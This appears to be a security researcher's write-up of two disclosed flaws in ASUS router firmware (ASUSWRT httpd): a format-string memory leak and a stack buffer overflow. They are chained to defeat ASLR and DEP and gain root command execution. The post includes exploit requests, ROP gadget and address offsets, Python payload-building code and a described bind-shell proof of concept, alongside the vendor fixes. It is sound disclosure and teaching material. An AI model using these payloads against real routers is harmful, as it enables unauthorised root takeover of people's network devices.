ASUSWRT RCE via Buffer Overflow, ASLR Bypass

A detailed look at the memory corruption/disclosure bugs ISE exploited in ASUS routers

In our previous article on the RT-AC3200 router, we briefly described a stack-based buffer overflow (CVE-2018-14712) and an uncontrolled format string (CVE-2018-14713) that can be combined for reliable remote code execution as root. The device in question uses the 32-bit ARMv7 architecture and runs version 2.6.36 of the Linux kernel, with DEP and ASLR enabled. In this post, we will discuss both flaws in detail and provide a proof-of-concept exploit that should work out of the box against any router running ASUSWRT 3.0.0.4.382.50010 (only slight modifications are necessary to port it to other vulnerable versions).

To temper expectations, it is important to mention the significant limitations of these vulnerabilities. Unless the target device has remote administration enabled, they are only exploitable from the LAN side. Exploitation also requires authentication. With widespread use of default credentials and unencrypted HTTP, that may not be a particularly high barrier for an attacker on the network, but anyone with a valid password can already upload backdoored firmware to produce the same results. The motivation for discussing these bugs comes primarily from technical interest, rather than their potential as a vector in real-world attacks.

The Target: httpd

ASUSWRT includes a tiny, custom HTTP server for web administration, referred to as httpd (not Apache). Since httpd is released under the GPL, ASUS has made the full source code available to those who inquire. Access to source was a highly valuable asset for this assessment; both vulnerabilities in this article were identified just by reading the code.

The server is written in C and dates back to 1999, based on file header comments. Only two files need to be read to gain a fairly complete understanding of the program: httpd.c and web.c. httpd.c contains all the high-level parsing functions that separate a request into its various components, like the target, headers, and body. These routines make great candidates for fuzzing, which I briefly attempted but abandoned when American Fuzzy Lop (AFL) was only able to find a buffer overflow disclosed a month prior (CVE-2018-8879). Were I to assess another ASUS device, I would definitely come up with a more systematic fuzzing methodology.

Those “unique” crashes? All one bug that was already reported and fixed.

On the other hand, the code in web.c is responsible for more ASUS router-specific request processing. In particular, it exposes a remote procedure call (RPC) endpoint at /appGet.cgi that accepts a number of hooks, each corresponding to a different function in the file. These handlers are the gateway to most of the server’s attack surface, since they rely heavily on user-supplied parameters, sometimes passing them to functions in shared libraries for granular processing. I focused most of my attention on the request handlers in web.c for this reason.

When Format Strings Go Wrong

While perusing the source, one thing that stood out to me was the prevalence of a macro called websWrite() , used by request handlers to write response data back to the client. It’s defined as follows:

#define websWrite(wp, fmt, args...) ({ int TMPVAR = fprintf(wp, fmt, ## args); fflush(wp); TMPVAR; })

In case the code above is unclear, using the macro is equivalent to writing data to a FILE pointer, in this case that of an HTTP connection, with fprintf() . That seems innocuous enough, but there’s the potential for an easily-overlooked vulnerability: an uncontrolled format string.

Here’s how that can arise. For each specifier in a given format string, fprintf() and its sibling functions expect corresponding arguments for the data to write. The ARM calling convention places a function’s first four arguments in registers r0, r1, r2, and r3, and the rest on the program’s call stack. In this case, the FILE stream and format string inhabit r0 and r1 respectively, so fprintf() will read the specifier arguments from r2, r3, and the stack.

Even if the calling code did not provide an argument for a specifier, fprintf() -style functions will still try to access it where it should be. The consequence? If the router developers made a mistake and passed any user-supplied input as the format string to websWrite() , an attacker could include specifiers like %x to read an arbitrary number of bytes off the stack. Since websWrite() is found so often throughout the source, it’s reasonable to expect at least one such blunder. Under this assumption, I wrote a quick regular expression to catch any obvious instances of format string bugs:

websWrite\(\w+, [^"]+[^)]+
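To illustrate how this search behaves, here is a minimal Python sketch that applies the same pattern to a few lines of C. The sample lines are hypothetical and written only for this example; they are not taken from web.c.

```python
import re

# The pattern from the article, unchanged.
PATTERN = re.compile(r'websWrite\(\w+, [^"]+[^)]+')

# Hypothetical source lines for illustration; not taken from web.c.
SAMPLE_LINES = [
    'websWrite(wp, "%s", output);',    # literal format string: not flagged
    'websWrite(wp, output);',          # variable as format string: flagged
    'websWrite(wp, "</table>\\n");',   # literal with no arguments: not flagged
]


def suspicious_calls(lines):
    """Return the lines where websWrite() does not receive a string literal as its format."""
    return [line for line in lines if PATTERN.search(line)]


if __name__ == "__main__":
    for line in suspicious_calls(SAMPLE_LINES):
        print(line)
```

A search like this is only a first filter. It can also flag harmless calls whose second argument is a variable holding a constant string, so every hit still needs to be read by hand.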

This pattern will match calls to websWrite() that don’t pass a string literal for the second argument, a decent indicator that a variable, perhaps attacker-controlled, is used instead. After running the search and ruling out a few false positives, I was left with several functions registered as request handlers in web.c, all beginning with ej_nvram_match . Here’s the first of them — line 19 contains the suspicious macro usage.

Uncontrolled format string in ej_nvram_match(), line 19

This function and its siblings comprise a family of hooks for testing key-value entries in the router’s NVRAM storage. They take at least three parameters: a key, a value, and a string to return to the client if there is a binding between them. The important part: when writing the output string, httpd passes it as the second argument to websWrite() , i.e. as the format string to fprintf() .

One only needs to make an authenticated nvram_match request with the output parameter set to a format string to see that this is a real vulnerability. In the request below, %25 is the URL-encoded form of a percent symbol, so the web server treats %25p as %p .

GET /appGet.cgi?hook=nvram_match("wan_proto","dhcp","%25p,%25p,%25p,%25p") HTTP/1.1

Host: 192.168.1.11

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36

Cookie: asus_token=S5YM7kw9Q2wxkUb9k1xTrkxqOeYy3ns
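The request path above can be generated rather than typed by hand. The following is a small sketch; the helper names nvram_match_path() and leak_format() are made up for this example, and the only encoding it performs is the percent-sign escaping described above.

```python
def leak_format(count):
    """Return a comma-separated run of %p specifiers, one per value to leak."""
    return ",".join(["%p"] * count)


def nvram_match_path(key, value, fmt):
    """Build the /appGet.cgi path for an nvram_match hook whose output is a format string."""
    # Percent signs are sent as %25 so the server decodes them back to '%'.
    encoded = fmt.replace("%", "%25")
    return '/appGet.cgi?hook=nvram_match("{}","{}","{}")'.format(key, value, encoded)


if __name__ == "__main__":
    print(nvram_match_path("wan_proto", "dhcp", leak_format(4)))
```

Raising the count passed to leak_format() walks further down the stack, one 4-byte word per specifier.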

The server’s response leaves no doubt as to the validity of this issue. The body is a JSON-esque payload with our format string interpreted and filled with interesting hexadecimal data:

HTTP/1.0 200 Ok

Server: httpd/2.0

x-frame-options: SAMEORIGIN

x-xss-protection: 1; mode=block

Date: Mon, 12 Nov 2018 15:38:49 GMT

Cache-Control: no-cache

Pragma: no-cache

Expires: 0

Content-Type: text/html

Connection: close

{

"nvram_match-wan_proto":0x3,0x7eac9a80,0x7eac9a88,0x7eac9a84

}

The response includes four hex values, one for each format specifier we provided. Due to the calling convention, the first pair of values comes from registers r2 and r3. The next pair comes right off the stack.
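As a rough sketch of that mapping, the Python below pulls the hex values out of a response body and labels where fprintf() would have fetched each one. The function names are invented for this example, and it assumes every %p consumes exactly one 4-byte word, which holds for 32-bit ARM.

```python
import re


def parse_leak(body):
    """Extract the hex values printed by %p from a response body."""
    return [int(value, 16) for value in re.findall(r"0x[0-9a-fA-F]+", body)]


def argument_source(index):
    """Where fprintf() fetches its index-th variadic argument (0-based) on 32-bit ARM.

    r0 and r1 hold the FILE pointer and the format string, so the first two
    variadic arguments come from r2 and r3 and the rest come from the stack.
    """
    if index < 2:
        return "r{}".format(index + 2)
    return "stack+{}".format(4 * (index - 2))


# Response body copied from the example above.
BODY = '{\n"nvram_match-wan_proto":0x3,0x7eac9a80,0x7eac9a88,0x7eac9a84\n}'

if __name__ == "__main__":
    for i, value in enumerate(parse_leak(BODY)):
        print("{:<8} {:#010x}".format(argument_source(i), value))
```

This parser only recognizes values printed with a 0x prefix; a C library that prints a null pointer as text such as (nil) would need an extra case.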

Being able to disclose memory contents is a serious vulnerability in and of itself, but it’s worth noting that format string attacks can be even more dangerous under certain conditions. Using the %n specifier, we can also write bytes to arbitrary memory locations if we control any data near the top of the stack (we do). This is one way to achieve code execution via uncontrolled format strings alone. At the time of discovery, I was aware of this possibility but decided to first explore web.c further, which leads us to the next issue I identified.

Overflowing The Pool

The function ej_delete_sharedfolder() is another RPC handler defined in web.c. It corresponds to the delete_sharedfolder hook, which takes two URL parameters: pool and folder . After verifying that both values are non-empty strings, the handler passes pool to the function get_mount_path() in the libdisk shared library, the source for which is also available to us in the ASUS GPL release. get_mount_path() is essentially a wrapper for another function, read_mount_data() :

Buffer overflow vulnerability in read_mount_data(), line 24

The vulnerability occurs on line 24 in the snippet above. Here, device_name refers to the pool string passed from get_mount_path() and ej_delete_sharedfolder() . The function uses sprintf() to copy this arbitrary-length value into a local buffer of size 8 ( target ) without any bounds checking. Since this buffer is stack-allocated, it should be possible for an attacker to overwrite the function’s return address with a long enough value of pool .

We can examine httpd in a debugger to confirm this. For the sake of having an ARM toolchain at hand, I copied over the server binary and its shared libraries to my Raspberry Pi 2 Model B. It’s the same architecture as the RT-AC3200, so the original executable runs without any extra work. I then ran httpd in GDB, set a breakpoint on the first sprintf() call within read_mount_data() , and issued a GET request for the following path with a 50-character pool string:

/appGet.cgi?hook=delete_sharedfolder()&folder=A&pool=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Once the breakpoint triggered, I stepped in and out of sprintf() and examined the current stack frame. GDB reported the saved PC for read_mount_data() as 0x41414140, which is essentially the 0x41414141 of ARM exploitation. As suspected, the function had clobbered its return address by copying my long pool value into the target buffer. Further testing revealed that the return address is fully overwritten once pool reaches 48 characters: 44 bytes of filler followed by the 4 bytes that replace the saved address.

Achieving the coveted pc = 0x41414140

With this vulnerability, we have a simple way to direct the control flow of httpd to any address we want. This ability is at the heart of any code execution attack based on memory corruption. However, the RT-AC3200 employs at least two exploit mitigation techniques that make real-world exploitation somewhat more involved:

Executable space protection/DEP/NX Bit

The NX bit is a CPU feature that modern operating systems use to mark the stack and heap as non-executable regions, a policy known variously as executable space protection or Data Execution Prevention (DEP). This countermeasure thwarts the original stack smashing attack, which relies on the stack being both writable and executable. However, we can trivially defeat DEP by using a method known as return-to-libc. Instead of jumping to shellcode on the stack, we can jump to an existing function in the text segment or shared libraries. Since these areas have to be executable for the program to work, there’s nothing DEP can do to prevent this.

The most popular existing function to exploit is system() , since it lets us run complex shell commands and comes linked with most programs. The precondition to exploitation, then, is determining where in the address space system() lives.

Address Space Layout Randomization (ASLR)

As the name suggests, ASLR randomizes the positions at which memory segments are loaded to make it difficult for an attacker to predict where potentially useful code and data lie in the address space. For the RT-AC3200, all sections are randomized, including the stack, heap, text segment, and shared libraries. We can’t simply jump to system() since its address is unpredictable between every run of the program.

But ASLR is far from bulletproof. If we can leak information from the program’s memory, such as pointers saved on the stack, we can use basic arithmetic to infer the locations of key sections in the process. While ASLR ensures the absolute addresses of functions change between repeated runs of a program, their locations remain fixed relative to one another. An attacker with a copy of the target binary can perform dynamic analysis to determine the offset of system() relative to the address of something in libc that was leaked from the call stack.

This is where the format string vulnerability we found comes into play. If we keep reading pointers from the stack until we hit something close to the C standard library, we can subtract it from the address of system() to find an offset that should work every time.

ROPing to libc?

For our attack to work, we at least need addresses for system() and our command string on the stack. If the target were an x86 system, that would be enough. But this router is ARM, and the calling convention requires that r0 contain the argument to system() . We don’t directly control this register, but there’s a way to move contents from the stack, which we do control, into r0: a return-oriented programming (ROP) gadget. This is just a set of executable instructions somewhere in memory that ends by restoring the saved program counter, i.e. returning.

All we need is a single gadget of the form pop {r0, [...], pc} . For more complicated ROP chains, there are plenty of advanced gadget finding tools out there, but objdump | grep works just as well for something basic like this. There turns out to be a suitable instruction in libpthread, specifically at __pthread_alt_lock + 108 :

$ objdump -S libpthread.so.0 | grep -P -B5 -A2 "pop\t{r0[^}]*, pc}"

8ab8: e5843004 str r3, [r4, #4]

8abc: e1560003 cmp r6, r3

8ac0: 0a000001 beq 8acc <__pthread_alt_lock+0x6c>

8ac4: e1a00005 mov r0, r5

8ac8: ebffece8 bl 3e70 <__pthread_wait_for_restart_signal@plt>

8acc: e8bd807f pop {r0, r1, r2, r3, r4, r5, r6, pc}

00008ad0 <__pthread_alt_timedlock>:

You’ll notice this instruction also pops data into registers r1-r6. That’s perfectly fine, but it does mean we’ll have to add 24 bytes of padding after the command string in our final payload (to account for six 4-byte words).
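The padding arithmetic generalizes to any gadget of this shape. Here is a short sketch, with a helper name chosen for this example, that derives the filler size from the register list of a pop instruction as printed by objdump.

```python
import re


def gadget_padding(instruction, word_size=4):
    """Bytes of filler needed for the registers popped between r0 and pc."""
    match = re.search(r"pop\s*\{([^}]*)\}", instruction)
    if match is None:
        raise ValueError("not a pop instruction")
    registers = [reg.strip() for reg in match.group(1).split(",")]
    if registers[0] != "r0" or registers[-1] != "pc":
        raise ValueError("gadget must load r0 first and pc last")
    # Every register other than r0 and pc consumes one word of filler.
    return word_size * (len(registers) - 2)


if __name__ == "__main__":
    print(gadget_padding("pop {r0, r1, r2, r3, r4, r5, r6, pc}"))
```

A gadget that popped only r0 and pc would need no filler at all, but this one is the gadget that objdump turned up.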

Not So Random Anymore

We can use the format string leak and GDB to compute the offsets to all three required addresses: the ROP gadget in libpthread, system() in libc, and a command string that will end up on the stack. The first step is to search for pointers close to the shared libraries and stack using our nvram_match information leak. Ultimately, the goal is to find a reliable, fixed offset for each target address. For example, here are five values leaked during one run of the program:

{

"nvram_match-wan_proto":0x3,0x7effca00,0x7effca08,0x7effca04,0x76ce86fc

}

Compare to the addresses of system() and the gadget in GDB:

(gdb) p system

$3 = {<text variable, no debug info>} 0x76ceb0f4 <system>

(gdb) p __pthread_alt_lock + 108

$4 = (<text variable, no debug info> *) 0x76ceaacc <__pthread_alt_lock+108>

The last address in the leak, 0x76ce86fc, looks the closest to both of these targets; the offsets are 0x29f8 and 0x23d0 for system() and our gadget in __pthread_alt_lock , respectively. What about a point of reference for our command string? The second, third, and fourth pointers all refer to adjacent objects on the stack, so any one of them should work as a base address. I’m going to use the third one, since I found that to work on both my Pi and the actual router. But where the shell command itself ends up depends on the length of our final payload, which will take the following structure:

44 bytes of padding

Address of gadget (4 bytes)

Address of command string (4 bytes)

24 bytes of padding to fill up r1-r6 for the gadget

Address of system() (4 bytes)

Command string (arbitrary length)

There are 80 bytes between the start of the payload and the start of the command. Knowing this, we can once again break on the first sprintf() call in read_mount_data() , provide a dummy payload to overflow the buffer (e.g. 'A'*80 + 'this is my test command' ), and examine the stack frame in GDB to determine where the string lies relative to our base address.
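The layout above can be sketched in a few lines of Python. The function and constant names are invented for this example, and the sketch assumes the target is little-endian; it only assembles the bytes and does not send anything.

```python
import struct

PAD_TO_RETURN = 44   # filler before the saved return address
GADGET_FILLER = 24   # consumed by r1-r6 when the gadget pops


def build_payload(gadget_addr, command_addr, system_addr, command):
    """Lay out the overflow payload in the order listed above."""
    return b"".join([
        b"A" * PAD_TO_RETURN,
        struct.pack("<I", gadget_addr),    # overwrites the saved return address
        struct.pack("<I", command_addr),   # popped into r0
        b"B" * GADGET_FILLER,              # popped into r1-r6
        struct.pack("<I", system_addr),    # popped into pc
        command,                           # the string system() will run
    ])


if __name__ == "__main__":
    # Addresses taken from the GDB session in this article; they change on every run.
    payload = build_payload(0x76CEAACC, 0x7EFFA9D0, 0x76CEB0F4, b"this is my test command")
    print(payload.index(b"this is my test command"))
```

Because the payload travels in a URL parameter, the raw bytes would still need to be percent-encoded before being placed in the request.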

Locating our shell command on the stack

The command ends up at 0x7effa9d0, exactly 0x2038 bytes below the leaked base address (0x7effca08), giving us the final offset needed to build an exploit.
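With all three offsets known, turning a fresh leak into usable addresses is plain arithmetic. This is a minimal sketch using the offsets measured above for this firmware version; the names are made up for the example, and the leak is assumed to be a list of five integers in the order the server printed them.

```python
SYSTEM_OFFSET = 0x29F8    # system() minus the leaked library pointer
GADGET_OFFSET = 0x23D0    # gadget minus the leaked library pointer
COMMAND_OFFSET = 0x2038   # leaked stack pointer minus the command string


def resolve_addresses(leak):
    """Compute the three target addresses from five leaked values."""
    stack_ptr = leak[2]   # third value: the stack reference point
    lib_ptr = leak[4]     # fifth value: the pointer near the shared libraries
    return {
        "system": lib_ptr + SYSTEM_OFFSET,
        "gadget": lib_ptr + GADGET_OFFSET,
        "command": stack_ptr - COMMAND_OFFSET,
    }


if __name__ == "__main__":
    # Leak from the run shown earlier in this section.
    leak = [0x3, 0x7EFFCA00, 0x7EFFCA08, 0x7EFFCA04, 0x76CE86FC]
    for name, address in resolve_addresses(leak).items():
        print("{:<8} {:#010x}".format(name, address))
```

Running it against the leak from the GDB session reproduces the addresses GDB reported, which is a useful sanity check before trying a live target.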

Putting It All Together

I ended up writing a Python script to automate the process of leaking information, computing offsets, and constructing the payload accordingly. My system() command starts a telnetd instance on port 1234 that offers a root shell.

A caveat: this exploit still isn’t 100% reliable. Since sprintf() only works on C-style strings, it will copy an incomplete payload into the buffer if there happens to be a null byte (0x00) in any of the calculated addresses. This will most likely cause the server to dereference an invalid memory location and crash. Fortunately, the router detects this and automatically restarts httpd, so you can just try again with the new addresses.
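One way to avoid wasting an attempt is to check the computed addresses for null bytes before sending anything. The sketch below is an illustration with invented helper names, not an excerpt from the PoC, and it again assumes little-endian packing.

```python
import struct


def has_null_byte(address):
    """True if the 32-bit address contains a 0x00 byte when packed."""
    return b"\x00" in struct.pack("<I", address)


def payload_is_safe(addresses):
    """True if sprintf() would copy every address in full."""
    return not any(has_null_byte(address) for address in addresses)


if __name__ == "__main__":
    print(payload_is_safe([0x76CEAACC, 0x7EFFA9D0, 0x76CEB0F4]))
    print(payload_is_safe([0x76CE00F4]))
```

If the check fails, the addresses have to change before another attempt is worthwhile, which in practice means waiting for httpd to be restarted.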

If all goes well, the script should print out the information leak and hang while telnetd runs on the target. You can safely press Ctrl+C and connect.

PoC to start a bind shell on port 1234

The Fix Is In

As one would expect, ASUS fixed the buffer overflow by calling snprintf() with the size of the destination array instead of plain sprintf() . This is how httpd formats string buffers in countless other locations and is the correct, uninteresting solution.

Strangely, though, ASUS didn’t patch the format string vulnerability by using a %s specifier. Their solution was to bail out whenever the supplied output parameter isn’t entirely alphanumeric, thereby preventing exploitation via percent symbols. They added this check for all given output strings in every hook of the nvram_match family — here’s an example from the changes merged into Asuswrt-Merlin:

ej_nvram_match* functions now check that the output string is alphanumeric
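The effect of that check can be modelled roughly as follows. This is a Python stand-in for illustration, not ASUS's C code; the function name is hypothetical, and how the real check treats an empty string is not something this sketch tries to reproduce.

```python
import string

ALPHANUMERIC = set(string.ascii_letters + string.digits)


def output_allowed(output):
    """Model of the patched behaviour: accept only entirely alphanumeric output strings."""
    return all(ch in ALPHANUMERIC for ch in output)


if __name__ == "__main__":
    for candidate in ["selected", "1", "%p,%p,%p,%p", "<script>"]:
        print(repr(candidate), output_allowed(candidate))
```

A filter like this blocks percent signs and angle brackets alike, but the output string is still handed to fprintf() as the format argument.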

To the developers’ credit, I suspect they had reflected cross-site scripting attacks in mind when they implemented this mitigation, which would make it more reasonable. Still, the decision to leave the underlying mistake intact strikes me as another vulnerability just waiting to happen.

Takeaways